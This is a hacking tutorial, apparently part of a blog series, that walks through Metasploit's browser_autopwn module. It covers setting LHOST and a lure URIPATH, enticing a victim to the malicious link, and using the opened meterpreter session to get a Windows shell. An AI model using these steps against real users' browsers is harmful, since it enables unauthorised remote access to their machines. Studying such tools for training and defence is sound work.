Metasploit's autopwn

In this continuing series on Metasploit basics, let's next look at a module that many aspiring hackers find useful—autopwn.

Generally, when we are trying to hack a target, we want to know as much as possible about the target through reconnaissance. Then, and only then, can we choose an appropriate exploit. We should know the operating system, the applications, the browser, the version of Java and Flash, etc. It's tedious, but necessary work. Using a Java exploit when a Flash exploit is called for simply won't work and might land you behind bars.

The beauty of autopwn is that it relieves you of some of the hard work of reconnaissance. Autopwn will first try to fingerprint the victim's browser, then "throw" at it whatever exploits it thinks might work. It makes life quite simple. The downside of autopwn is that it is very noisy and can lead to either detection by the target or crashing the browser, which happens often.

Let's take a look at it now.

Step 1: Fire Up Kali & Open Metasploit

Let's fire up Kali and start Metasploit with the command:

kali > msfconsole

 

Step 2: Use Autopwn

To get started with any exploit, generally we start with the use command. Since the autopwn module is located at auxiliary/server/browser_autopwn, we get started by typing:

msf> use auxiliary/server/browser_autopwn

This will load the module. Then, to get more information on this module, let's type:

msf > auxiliary(browser_autopwn) > info

 

As you can see in the screenshots above and below, this provides us with all the information we need to get started, including each of the options and a brief description of the module.

 

Step 3: Show and Set Options

Next, like nearly all the Metasploit modules, we need to ask it to show us the options.

msf > show options

 

As you can see, we need to set:

  • LHOST

  • URIPATH

The LHOST is the local host. In other words , our Kali attack system. Since mine is at 192.168.1. 106, I type:

msf > set LHOST 192.168.1.106

Now we need to create a URIPATH. This is the URL that we want the exploits to be located at on our malicious server. We can call it anything we want or we could leave it blank and Metasploit will set it to a default string. Since we are trying to entice our victim to click on this link, let's try to make it inviting and use the name of our favorite hacker training site, Hackers-Arise.

msf > set URIPATH hackers-arise

 

To get started, that's all we need to set.

Step 4: Exploit

Finally, let's type exploit:

msf > exploit

This will start the autopwn module. It starts numerous servers and then loads the exploits that may work against that browser. Each one represents a different possible vulnerability in our browser. Be patient as this takes awhile.

 

Notice in the middle of the above screenshot that it loaded 20 exploit modules.

Step 5: Browse to the Server

Now from a Windows 7 system with Internet Explorer 9, when the target navigates to our webserver at 192.168.1.106:8080/hackers-arise they will get this warning from IE:

 

Back on our Kali system, autopwn is fingerprinting the browser and trying to determine which of the exploits will work.

 

Note in the middle of this screenshot that autopwn is "responding with 13 exploits." It will now begin trying each of those exploits against the browser with the hope that at least one will work.

Step 6: Check Your Sessions

Finally, let's go back to our Kali system and see whether any sessions have opened by typing:

sessions -l

When we do, Metasploit will list all our active sessions. Looks like I only have one.

 

To connect to that meterpreter session, we simply type:

sessions -i 1

Where 1 is the ID of our session from the previous command. (See it to the far left column?) This will then connect me to my meterpreter connection that looks like this:

meterpreter >

This is my direct connection into the Windows 7 machine. When I type:

meterpreter > shell

it drops me into a Windows command prompt shell like below.

 

Depending upon the browser and its configuration, you might get several meterpreter sessions, you might get one like I did, or you might get none. In the worst case, all of the exploits running against the browser can crash the browser.

Although autopwn is a good Metasploit training tool, it is less than stealthy and often will overwhelm the browser with exploits and crash it.